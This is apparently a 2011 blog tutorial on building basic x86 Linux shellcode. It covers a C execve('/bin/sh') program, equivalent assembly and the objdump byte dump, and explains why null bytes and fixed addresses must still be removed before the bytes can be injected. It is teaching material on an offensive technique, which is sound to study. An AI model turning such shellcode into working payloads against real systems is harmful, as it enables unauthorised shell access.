Thursday, March 10, 2011

Shellcode Basics

    Here we use gcc 4.4.1, gdb, and objdump to construct shellcode. The goal is to embed this code in a C program and run it as an exploit on a vulnerable Linux machine.
    The following is the basic C code to spawn a shell using the execve system call. Its prototype is int execve(const char *filename, char *const argv[], char *const envp[]). On success it does not return, because the calling process image is replaced by the new program; on failure it returns -1 and sets errno.

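//shell.c
#include <stddef.h>   // NULL
#include <unistd.h>   // execve

int main(void)
{
   char *name[2];

   name[0] = "/bin/sh";   // program to run, also passed as argv[0]
   name[1] = NULL;        // the argument list must end with a NULL pointer
   execve(name[0], name, NULL);
   return 1;              // reached only if execve fails
}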

shell.c is compiled with: gcc -o shell -ggdb -static shell.c
    The -static flag is needed here. Without it, the actual code for execve is not included in the binary; there is only a reference to the dynamic C library, which would normally be linked in at load time.
    We can then look at the assembler code by disassembling main in gdb (step 1: gdb ./shell, step 2: disas main) to get a basic idea of how the assembly code is written.
    Now we have to write the assembly code ourselves and check its shellcode using objdump. I am not going to teach how to write assembly code from the basics. :)

#shell.s
#read the C code thoroughly before looking at this assembly code
.data
    sh:
       .asciz "/bin/sh"
    NULL1:
       .int 0
    shaddr:
       .int 0
    NULL2:
       .int 0 
.text
    .globl _start
_start:
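    movl $sh, shaddr      # store the address of sh in shaddr (this is argv[0])
    movl $11, %eax        # 11 is the system call number for execve
    movl $sh, %ebx        # 1st argument: path of the program to run
    movl $shaddr, %ecx    # 2nd argument: argv, the pointer list starting at shaddr
    movl $NULL2, %edx     # 3rd argument: envp, a list holding only a NULL
    int $0x80             # trap into the kernel to perform the system call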
           
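The assembly code above uses AT&T syntax. The .data section declares the variables used by the program, and the _start: label marks where execution begins. In general, we move the system call number into %eax and the arguments for the system call into %ebx, %ecx, %edx and so on. In memory, the data section is laid out as "/bin/sh", followed by NULL1, then shaddr (which holds the address of sh), and finally NULL2.
  Comparing this with the C code in shell.c: sh is the string "/bin/sh", shaddr plays the role of name[0], and NULL2, the word right after shaddr, plays the role of name[1], so the address of shaddr corresponds to name. The address of NULL2 is also passed as the environment pointer. The C code passes NULL there, while the assembly passes a list whose only entry is NULL, that is, an empty environment. NULL1 is never referenced by the code; it is just a zero word after the string. Finally, int $0x80 raises the software interrupt that hands control to the kernel to run the system call.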
   Assembling, linking, and running the assembly code above looks like this:

manoj@manoj-laptop:~/Desktop/buffer$ as -gstabs -o shell.o shell.s
manoj@manoj-laptop:~/Desktop/buffer$ ld -o shell shell.o
manoj@manoj-laptop:~/Desktop/buffer$ ./shell
$

  Now we use the objdump tool to look at the shellcode for our assembly code:

manoj@manoj-laptop:~/Desktop/buffer$ objdump -d ./shell

./shell:     file format elf32-i386


Disassembly of section .text:

08048074 <_start>:
 8048074:    c7 05 a0 90 04 08 94     movl   $0x8049094,0x80490a0
 804807b:    90 04 08
 804807e:    b8 0b 00 00 00           mov    $0xb,%eax
 8048083:    bb 94 90 04 08           mov    $0x8049094,%ebx
 8048088:    b9 a0 90 04 08           mov    $0x80490a0,%ecx
 804808d:    ba a4 90 04 08           mov    $0x80490a4,%edx
 8048092:    cd 80                    int    $0x80


   The second column (c7, 05, ...) holds the machine code bytes, which make up the shellcode. However, this shellcode has the following problems:
1. There are zero bytes (00) in the shellcode. To implement the exploit, the shellcode is placed in a character array, and in a C string a null byte marks the end of the string. If we give this as string input to a program, the program ignores everything after the first 00. Hence we have to modify the assembly code to remove these null bytes.
2. The addresses, for example the location of "/bin/sh" (0x8049094), are hard-coded. The shellcode may therefore not work on other machines, so we need relative addressing to make it more flexible.
   In my next post I will show how to get shellcode that is flexible and free of the problems mentioned above.
